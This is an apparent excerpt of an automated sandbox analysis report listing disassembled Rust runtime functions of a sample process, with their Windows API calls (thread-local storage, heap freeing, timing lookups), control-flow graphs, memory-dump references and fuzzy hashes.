                                                                            • Snapshot File: hcaresult_0_2_f90000_888.jbxd
                                                                            Similarity
                                                                            • API ID: Lock$FreeHeapReleaseShared$AcquireExclusiveValue
                                                                            • String ID: Box<dyn Any><unnamed>$cannot access a Thread Local Storage value during or after destruction/rustc/07dca489ac2d933c78d3c5158e3f43beefeb02ce\library\std\src\thread\local.rs$chunk size must be non-zero
                                                                            • API String ID: 1439667220-2790338109
                                                                            • Opcode ID: 4b78de97047fd6894a043120391e0649243e784582126098cd91ca2379cd6d17
                                                                            • Instruction ID: 3891dffaaba61f7d395f94fef6205b1743d3582cb3952b309fabe49548c7d102
                                                                            • Opcode Fuzzy Hash: 4b78de97047fd6894a043120391e0649243e784582126098cd91ca2379cd6d17
                                                                            • Instruction Fuzzy Hash: 3D0288B4500B418FD739CF29C484793BBE1AF59308F048A1DD89A8BB52D7B5F509CBA2
                                                                            Function 011A6F30 Relevance: 3.0, Strings: 2, Instructions: 459COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2711833412.0000000000F91000.00000020.00000001.01000000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                            • Associated: 00000000.00000002.2711803042.0000000000F90000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2712079371.00000000012EA000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2712079371.0000000001339000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2712217704.000000000141B000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2712249437.000000000141E000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2712279862.000000000141F000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2712310372.0000000001421000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_f90000_888.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: UNC\$chunk size must be non-zero
                                                                            • API String ID: 0-4000572898
                                                                            • Opcode ID: f9a98194d41424f1a4634c9e58f084e27b37b6327629b50982788e9dabcdb6d2
                                                                            • Instruction ID: 50c042716ea63936768925cdb3721c26784e9608d5a1a2d8073f50fb5bfb4c82
                                                                            • Opcode Fuzzy Hash: f9a98194d41424f1a4634c9e58f084e27b37b6327629b50982788e9dabcdb6d2
                                                                            • Instruction Fuzzy Hash: A0F13A62D0C3F00AE32E862D84A423AFFE28FC6215F5E866EF9E5171D2D3754941C792
                                                                            Function 00FB1340 Relevance: .4, Instructions: 417COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2711833412.0000000000F91000.00000020.00000001.01000000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                            • Associated: 00000000.00000002.2711803042.0000000000F90000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2712079371.00000000012EA000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2712079371.0000000001339000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2712217704.000000000141B000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2712249437.000000000141E000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2712279862.000000000141F000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2712310372.0000000001421000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_f90000_888.jbxd
                                                                            Similarity
                                                                            • API ID: Value
                                                                            • String ID:
                                                                            • API String ID: 3702945584-0
                                                                            • Opcode ID: 1933899ed2ac04029f8c203066181ae4861368fe5aef8895aceb5a4030c2907c
                                                                            • Instruction ID: fbb049b95cd625db713a8d4a20930657d444ee6889a6775cdbee96e7bc0902ce
                                                                            • Opcode Fuzzy Hash: 1933899ed2ac04029f8c203066181ae4861368fe5aef8895aceb5a4030c2907c
                                                                            • Instruction Fuzzy Hash: 1AF15E37A096865FC311867D84514A9BFA29BEA108BAE86DDE8D88F343D531CD0FC7D1
                                                                            Function 009A4CB1 Relevance: .4, Instructions: 371COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000003.2632131370.00000000009A0000.00000004.00000020.00020000.00000000.sdmp, Offset: 009A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_3_9a0000_888.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 90dfafd9c37e2e6092d742c802aa182516d02e00df401cbe1fe554ceae061115
                                                                            • Instruction ID: 041d03e22124525102feea5dab537c6a86ab4baa872e7f51e8237df994922084
                                                                            • Opcode Fuzzy Hash: 90dfafd9c37e2e6092d742c802aa182516d02e00df401cbe1fe554ceae061115
                                                                            • Instruction Fuzzy Hash: 63D1109651E7C15FE3538B3498796927FB1AF27214B0E85DBC8C08F5E3E2409A1AD363
                                                                            Function 011BCA40 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 122libraryloaderCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 120 11bca40-11bca48 121 11bca4a 120->121 122 11bcac4-11bcace call 12e6800 120->122 124 11bca4b-11bca55 TlsGetValue 121->124 122->124 125 11bca5f-11bca66 124->125 126 11bca57-11bca5d 124->126 129 11bca68 125->129 130 11bcad3-11bcadd call 12e6800 125->130 126->125 128 11bcab9-11bcabc 126->128 133 11bcac0-11bcac3 128->133 131 11bca69-11bca73 TlsGetValue 129->131 130->131 134 11bcabe 131->134 135 11bca75-11bca79 131->135 134->133 137 11bca7b-11bca93 call fb1220 135->137 138 11bcab3 135->138 141 11bcaeb-11bcb0f call 12dbae0 137->141 142 11bca95-11bcaa8 137->142 138->128 150 11bcb59-11bcb68 call 12dc380 141->150 151 11bcb11-11bcb1f 141->151 144 11bcaaa 142->144 145 11bcadf-11bcae9 call 12e6800 142->145 148 11bcaab-11bcaad TlsSetValue 144->148 145->148 148->138 155 11bcb6d-11bcbad call 12dbef0 GetModuleHandleA 150->155 153 11bcb2f-11bcb43 151->153 154 11bcb21-11bcb27 151->154 153->155 157 11bcb45-11bcb58 153->157 154->150 156 11bcb29 154->156 160 11bcbaf-11bcbbc GetProcAddress 155->160 161 11bcbc5-11bcbca 155->161 156->153 160->161 162 11bcbbe 160->162 162->161
                                                                            APIs
                                                                            • TlsGetValue.KERNEL32(00000000,00000000,012E6F25), ref: 011BCA4C
                                                                            • TlsGetValue.KERNEL32(00000000), ref: 011BCA6A
                                                                            • TlsSetValue.KERNEL32(00000000,00000000), ref: 011BCAAD
                                                                              • Part of subcall function 012E6800: InitOnceBeginInitialize.KERNEL32(0141B18C,00000000,00000000,00000000), ref: 012E6823
                                                                              • Part of subcall function 012E6800: TlsAlloc.KERNEL32 ref: 012E683C
                                                                              • Part of subcall function 012E6800: InitOnceComplete.KERNEL32(0141B18C,00000000,00000000), ref: 012E6879
                                                                              • Part of subcall function 012E6800: TlsAlloc.KERNEL32 ref: 012E6881
                                                                              • Part of subcall function 012E6800: InitOnceComplete.KERNEL32(0141B18C,00000004,00000000,?,013D161C), ref: 012E68DF
                                                                            • GetModuleHandleA.KERNEL32(kernel32), ref: 011BCBA5
                                                                            • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 011BCBB5
                                                                            Strings
                                                                            • GetSystemTimePreciseAsFileTime, xrefs: 011BCBAF
                                                                            • overflow when adding duration to instantlibrary\std\src\time.rs, xrefs: 011BCB59
                                                                            • chunk size must be non-zero, xrefs: 011BCB8B
                                                                            • kernel32, xrefs: 011BCBA0
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2711833412.0000000000F91000.00000020.00000001.01000000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                            • Associated: 00000000.00000002.2711803042.0000000000F90000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2712079371.00000000012EA000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2712079371.0000000001339000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2712217704.000000000141B000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2712249437.000000000141E000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2712279862.000000000141F000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2712310372.0000000001421000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_f90000_888.jbxd
                                                                            Similarity
                                                                            • API ID: InitOnceValue$AllocComplete$AddressBeginHandleInitializeModuleProc
                                                                            • String ID: GetSystemTimePreciseAsFileTime$chunk size must be non-zero$kernel32$overflow when adding duration to instantlibrary\std\src\time.rs
                                                                            • API String ID: 3931988749-618619756
                                                                            • Opcode ID: 8fee0e6209f1ad2c5ff02ecb94e3ffbcf4b9f7c6a340faa8dc52fc75832ba97f
                                                                            • Instruction ID: 8e964e4e4b78445010654ad4be062cd30577efbbb4738182b0763e2255a6fb41
                                                                            • Opcode Fuzzy Hash: 8fee0e6209f1ad2c5ff02ecb94e3ffbcf4b9f7c6a340faa8dc52fc75832ba97f
                                                                            • Instruction Fuzzy Hash: 143107B27042114BD71CAB39E99C3AB3AE6FB95680F4EC419E50ADB394EB34CC0487D1
                                                                            Function 012E6800 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 90memoryCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 273 12e6800-12e680c 274 12e680e-12e682f InitOnceBeginInitialize 273->274 275 12e6881-12e688d TlsAlloc 273->275 278 12e68bc-12e68d5 call 12e6950 274->278 279 12e6835-12e683a 274->279 276 12e691b-12e694f call 12e6980 275->276 277 12e6893-12e689c 275->277 283 12e689e-12e68a1 277->283 284 12e68a7-12e68ac TlsFree 277->284 287 12e68da-12e6916 InitOnceComplete call 12dbef0 278->287 281 12e683c-12e6845 TlsAlloc 279->281 282 12e68a3-12e68a5 279->282 281->287 288 12e684b-12e685f 281->288 290 12e68b2 282->290 289 12e68b3-12e68bb 283->289 284->290 287->276 291 12e6860-12e686b 288->291 290->289 291->291 293 12e686d-12e687f InitOnceComplete 291->293 293->289
                                                                            APIs
                                                                            • InitOnceBeginInitialize.KERNEL32(0141B18C,00000000,00000000,00000000), ref: 012E6823
                                                                            • TlsAlloc.KERNEL32 ref: 012E683C
                                                                            • InitOnceComplete.KERNEL32(0141B18C,00000000,00000000), ref: 012E6879
                                                                            • TlsAlloc.KERNEL32 ref: 012E6881
                                                                            • TlsFree.KERNEL32 ref: 012E68AC
                                                                            • InitOnceComplete.KERNEL32(0141B18C,00000004,00000000,?,013D161C), ref: 012E68DF
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2711833412.0000000000F91000.00000020.00000001.01000000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                            • Associated: 00000000.00000002.2711803042.0000000000F90000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2712079371.00000000012EA000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2712079371.0000000001339000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2712217704.000000000141B000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2712249437.000000000141E000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2712279862.000000000141F000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2712310372.0000000001421000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_f90000_888.jbxd
                                                                            Similarity
                                                                            • API ID: InitOnce$AllocComplete$BeginFreeInitialize
                                                                            • String ID: chunk size must be non-zero
                                                                            • API String ID: 977713646-1054586041
                                                                            • Opcode ID: ff120bd05511a2c62ca5a6496f96d03bf3206321bdcf6e740add1f8f128116d0
                                                                            • Instruction ID: 0501b72b0e53f8bd35e750b4e456b238aa345cc5bc0c69893f90b68ed240cbb1
                                                                            • Opcode Fuzzy Hash: ff120bd05511a2c62ca5a6496f96d03bf3206321bdcf6e740add1f8f128116d0
                                                                            • Instruction Fuzzy Hash: 6831B2B51183029FE720DF14D44C71ABBE5FBA0359F60881CE6C98B291C774D88DCB92
                                                                            Function 011BDF60 Relevance: 7.7, APIs: 4, Strings: 1, Instructions: 176memoryCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 294 11bdf60-11bdff2 296 11be05b-11be067 294->296 297 11bdff4-11be028 294->297 298 11be06d-11be070 296->298 299 11be1a6-11be1b6 296->299 304 11be04a-11be055 HeapFree 297->304 305 11be02a-11be02e 297->305 301 11be0bf-11be0c9 298->301 302 11be072-11be075 298->302 301->299 303 11be0cf-11be10b 301->303 306 11be07b-11be096 call 11be830 302->306 307 11be131-11be14c call 11be830 302->307 303->299 316 11be111-11be12f 303->316 304->296 308 11be030-11be033 305->308 309 11be035-11be038 305->309 306->299 318 11be09c-11be0ba 306->318 307->299 317 11be14e-11be169 307->317 313 11be03b-11be044 HeapFree 308->313 309->313 313->304 322 11be16c-11be173 316->322 317->322 318->322 323 11be195-11be1a0 HeapFree 322->323 324 11be175-11be179 322->324 323->299 325 11be17b-11be17e 324->325 326 11be180-11be183 324->326 327 11be186-11be18f HeapFree 325->327 326->327 327->323
                                                                            APIs
                                                                            • HeapFree.KERNEL32(00000000,00000000), ref: 011BE044
                                                                            • HeapFree.KERNEL32(00000000,?), ref: 011BE055
                                                                            • HeapFree.KERNEL32(00000000,00000000), ref: 011BE18F
                                                                            • HeapFree.KERNEL32(00000000,?), ref: 011BE1A0
                                                                            Strings
                                                                            • chunk size must be non-zero, xrefs: 011BE0E7
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2711833412.0000000000F91000.00000020.00000001.01000000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                            • Associated: 00000000.00000002.2711803042.0000000000F90000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2712079371.00000000012EA000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2712079371.0000000001339000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2712217704.000000000141B000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2712249437.000000000141E000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2712279862.000000000141F000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2712310372.0000000001421000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_f90000_888.jbxd
                                                                            Similarity
                                                                            • API ID: FreeHeap
                                                                            • String ID: chunk size must be non-zero
                                                                            • API String ID: 3298025750-1054586041
                                                                            • Opcode ID: 335933822fb4551928a0f658ec948fe91bd3c162b529a3ed56aca5edd5b3cd7b
                                                                            • Instruction ID: ff66fdf1bad02d1b86360e9bcb2d177f6a183e32105346272570a32f7d76fb09
                                                                            • Opcode Fuzzy Hash: 335933822fb4551928a0f658ec948fe91bd3c162b529a3ed56aca5edd5b3cd7b
                                                                            • Instruction Fuzzy Hash: 3081F2B4D012089FDB25CF98D988AEEBBF4FF09314F244119E819AB391D375A945CF91
                                                                            Function 011C0230 Relevance: 7.7, APIs: 6, Instructions: 161memoryCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 328 11c0230-11c025b call 11bde20 call 11c0230 334 11c0261 328->334 335 11c02e2-11c02ec call 12e6800 328->335 336 11c0262-11c026c TlsGetValue 334->336 335->336 338 11c026e-11c0274 336->338 339 11c027b-11c0282 336->339 338->339 341 11c0276-11c0279 338->341 342 11c0284 339->342 343 11c02f1-11c02fb call 12e6800 339->343 344 11c0293-11c0299 341->344 346 11c0285-11c0291 TlsGetValue 342->346 343->346 346->344 347 11c029a-11c029e 346->347 349 11c0306-11c0324 call 12e6ee0 347->349 350 11c02a0-11c02b8 call fb1220 347->350 349->341 355 11c032a-11c032c 349->355 356 11c02be-11c02d4 350->356 357 11c0349-11c0396 call 12dbae0 350->357 355->341 358 11c0332-11c0335 355->358 359 11c02fd 356->359 360 11c02d6-11c02e0 call 12e6800 356->360 368 11c0398-11c0399 357->368 369 11c039b-11c03b3 call 12e6800 357->369 358->341 363 11c033b-11c0344 call 11b9d00 358->363 362 11c02fe-11c0300 TlsSetValue 359->362 360->362 362->349 363->341 371 11c03b6-11c03c3 TlsSetValue 368->371 369->371 373 11c03d9-11c03ec HeapFree 371->373 374 11c03c5-11c03ca 371->374 377 11c03ee-11c03ef 373->377 378 11c03f1-11c03fe call 12e6800 373->378 374->373 376 11c03cc-11c03cf 374->376 376->373 379 11c03d1-11c03d4 call 11b9d00 376->379 380 11c0403-11c041c TlsSetValue 377->380 378->380 379->373
                                                                            APIs
                                                                              • Part of subcall function 011BDE20: HeapFree.KERNEL32(00000000,00000000), ref: 011BDEE5
                                                                              • Part of subcall function 011BDE20: HeapFree.KERNEL32(00000000,?), ref: 011BDEF6
                                                                              • Part of subcall function 011C0230: TlsGetValue.KERNEL32(00000000,012DBAEB,012E674A,?,?,?,?,?,?,?,?,?,?), ref: 011C0263
                                                                            • TlsGetValue.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 011C0286
                                                                            • TlsSetValue.KERNEL32(-00000001,00000000,?,?,?,?,?,?,?,?,?,?), ref: 011C0300
                                                                            • TlsSetValue.KERNEL32(00000000,00000001), ref: 011C03B9
                                                                            • HeapFree.KERNEL32(00000000,?), ref: 011C03E2
                                                                              • Part of subcall function 012E6800: InitOnceBeginInitialize.KERNEL32(0141B18C,00000000,00000000,00000000), ref: 012E6823
                                                                              • Part of subcall function 012E6800: TlsAlloc.KERNEL32 ref: 012E683C
                                                                              • Part of subcall function 012E6800: InitOnceComplete.KERNEL32(0141B18C,00000000,00000000), ref: 012E6879
                                                                            • TlsSetValue.KERNEL32(00000000,00000000), ref: 011C0406
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2711833412.0000000000F91000.00000020.00000001.01000000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                            • Associated: 00000000.00000002.2711803042.0000000000F90000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2712079371.00000000012EA000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2712079371.0000000001339000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2712217704.000000000141B000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2712249437.000000000141E000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2712279862.000000000141F000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2712310372.0000000001421000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_f90000_888.jbxd
                                                                            Similarity
                                                                            • API ID: Value$FreeHeap$InitOnce$AllocBeginCompleteInitialize
                                                                            • String ID:
                                                                            • API String ID: 16637642-0
                                                                            • Opcode ID: 47aaf42130de2d1d956375a0c9d62e381593cd8b1b388e35cfa9cd3f7829fc77
                                                                            • Instruction ID: 0a780de9d504e36f54f7a4a4134320fed5ddaab0ac6538b93ff21094a6ceda88
                                                                            • Opcode Fuzzy Hash: 47aaf42130de2d1d956375a0c9d62e381593cd8b1b388e35cfa9cd3f7829fc77
                                                                            • Instruction Fuzzy Hash: 8F51CF74A04206CFEB28DF69D81876B7BE6FF68A44F05842DF9069B294D7759800CB91
                                                                            Function 011AFDE0 Relevance: 7.6, APIs: 6, Instructions: 149memoryCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 383 11afde0-11afde9 384 11afe98-11afea2 call 12e6800 383->384 385 11afdef 383->385 386 11afdf0-11afdfa TlsGetValue 384->386 385->386 388 11afe0c-11afe13 386->388 389 11afdfc-11afe02 386->389 392 11afe19 388->392 393 11afea7-11afeb1 call 12e6800 388->393 389->388 391 11afe04-11afe07 389->391 394 11afe93-11afe97 391->394 395 11afe1a-11afe24 TlsGetValue 392->395 393->395 397 11afe91 395->397 398 11afe26-11afe2a 395->398 397->394 400 11afe2c-11afe44 call fb1220 398->400 401 11afe67-11afe7f 398->401 407 11afec2-11aff16 call 12dbae0 400->407 408 11afe46-11afe5c 400->408 401->394 403 11afe81-11afe83 401->403 403->394 405 11afe85-11afe88 403->405 405->394 406 11afe8a-11afe8f call 107d250 405->406 406->394 417 11aff1b-11aff33 call 12e6800 407->417 418 11aff18-11aff19 407->418 410 11afe5e 408->410 411 11afeb6-11afec0 call 12e6800 408->411 415 11afe5f-11afe61 TlsSetValue 410->415 411->415 415->401 420 11aff36-11aff43 TlsSetValue 417->420 418->420 423 11aff59-11aff6c HeapFree 420->423 424 11aff45-11aff4a 420->424 426 11aff6e-11aff6f 423->426 427 11aff71-11aff7e call 12e6800 423->427 424->423 425 11aff4c-11aff4f 424->425 425->423 428 11aff51-11aff54 call 107d250 425->428 429 11aff83-11aff9c TlsSetValue 426->429 427->429 428->423
                                                                            APIs
                                                                            • TlsGetValue.KERNEL32(00000000,?,80000000,011BEFEC), ref: 011AFDF1
                                                                            • TlsGetValue.KERNEL32(00000000,?,80000000,011BEFEC), ref: 011AFE1B
                                                                            • TlsSetValue.KERNEL32(00000000,00000000,?,80000000,011BEFEC), ref: 011AFE61
                                                                            • TlsSetValue.KERNEL32(00000000,00000001), ref: 011AFF39
                                                                            • HeapFree.KERNEL32(00000000,?), ref: 011AFF62
                                                                              • Part of subcall function 012E6800: InitOnceBeginInitialize.KERNEL32(0141B18C,00000000,00000000,00000000), ref: 012E6823
                                                                              • Part of subcall function 012E6800: TlsAlloc.KERNEL32 ref: 012E683C
                                                                              • Part of subcall function 012E6800: InitOnceComplete.KERNEL32(0141B18C,00000000,00000000), ref: 012E6879
                                                                            • TlsSetValue.KERNEL32(00000000,00000000), ref: 011AFF86
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2711833412.0000000000F91000.00000020.00000001.01000000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                            • Associated: 00000000.00000002.2711803042.0000000000F90000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2712079371.00000000012EA000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2712079371.0000000001339000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2712217704.000000000141B000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2712249437.000000000141E000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2712279862.000000000141F000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2712310372.0000000001421000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_f90000_888.jbxd
                                                                            Similarity
                                                                            • API ID: Value$InitOnce$AllocBeginCompleteFreeHeapInitialize
                                                                            • String ID:
                                                                            • API String ID: 2438581317-0
                                                                            • Opcode ID: eec51556dc9b817eb779438dca33d8a5b76de9ca98b78f9a1a719a692d8d1758
                                                                            • Instruction ID: d5247ea474716996b55995786eb42c9e46292fab47d6b7ada5940577f9682001
                                                                            • Opcode Fuzzy Hash: eec51556dc9b817eb779438dca33d8a5b76de9ca98b78f9a1a719a692d8d1758
                                                                            • Instruction Fuzzy Hash: A241E2756002178BE7289F69D84C76EBFF9FF44790F864419EA05DB291C774D802CBA1
                                                                            Function 011A24F0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 50libraryloaderCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 432 11a24f0-11a256d call 11a1d20 call 11a1e80 GetModuleHandleA 437 11a256f-11a257c GetProcAddress 432->437 438 11a2585-11a258a 432->438 437->438 439 11a257e 437->439 439->438
                                                                            APIs
                                                                              • Part of subcall function 011A1E80: HeapFree.KERNEL32(00000000,00000000), ref: 011A1EF3
                                                                              • Part of subcall function 011A1E80: HeapFree.KERNEL32(00000000,?), ref: 011A1F02
                                                                            • GetModuleHandleA.KERNEL32(ntdll), ref: 011A2565
                                                                            • GetProcAddress.KERNEL32(00000000,NtWaitForKeyedEvent), ref: 011A2575
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2711833412.0000000000F91000.00000020.00000001.01000000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                            • Associated: 00000000.00000002.2711803042.0000000000F90000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2712079371.00000000012EA000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2712079371.0000000001339000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2712217704.000000000141B000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2712249437.000000000141E000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2712279862.000000000141F000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2712310372.0000000001421000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_f90000_888.jbxd
                                                                            Similarity
                                                                            • API ID: FreeHeap$AddressHandleModuleProc
                                                                            • String ID: NtWaitForKeyedEvent$ntdll
                                                                            • API String ID: 2009576768-2815205136
                                                                            • Opcode ID: d00fc08d18e4a5a3de6e7a4b5aeda1c9e4bfb6035a7757592c4c84e9a3647983
                                                                            • Instruction ID: 73c0996e805be82a206ec1116678b3192efb7de3f0478c522f3c6fdf607affdd
                                                                            • Opcode Fuzzy Hash: d00fc08d18e4a5a3de6e7a4b5aeda1c9e4bfb6035a7757592c4c84e9a3647983
                                                                            • Instruction Fuzzy Hash: A10112B4508302AFD304DF25D55575B7FE5FB88748F50891DF89597340E7B4D9088B92
                                                                            Function 011A22A0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 114COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 440 11a22a0-11a22db call 11a2420 443 11a238c-11a23a3 call 12dc380 440->443 444 11a22e1-11a22e8 440->444 455 11a23eb-11a240d call 11a24f0 443->455 445 11a236e-11a2374 444->445 446 11a22ee-11a22fc 444->446 448 11a237b-11a238b 445->448 449 11a2376 call 11a2260 445->449 450 11a22fe 446->450 451 11a2316-11a231f 446->451 449->448 454 11a2300-11a2312 WaitOnAddress 450->454 456 11a235d-11a236c 451->456 457 11a2321-11a233e 451->457 454->454 458 11a2314 454->458 463 11a240f-11a2412 call 11a2260 455->463 464 11a2417-11a241b 455->464 456->445 465 11a2340-11a2350 457->465 466 11a23a5-11a23e6 call 12dbef0 457->466 458->445 463->464 465->456 467 11a2352-11a235b CloseHandle 465->467 466->455 467->456
                                                                            APIs
                                                                            • WaitOnAddress.KERNELBASE(?,013D1650,00000001,000000FF), ref: 011A230A
                                                                            • CloseHandle.KERNEL32(FFFFFFFF), ref: 011A2355
                                                                            Strings
                                                                            • use of std::thread::current() is not possible after the thread's local data has been destroyed, xrefs: 011A238C
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2711833412.0000000000F91000.00000020.00000001.01000000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                            • Associated: 00000000.00000002.2711803042.0000000000F90000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2712079371.00000000012EA000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2712079371.0000000001339000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2712217704.000000000141B000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2712249437.000000000141E000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2712279862.000000000141F000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2712310372.0000000001421000.00000002.00000001.01000000.00000000.sdmpDownload File
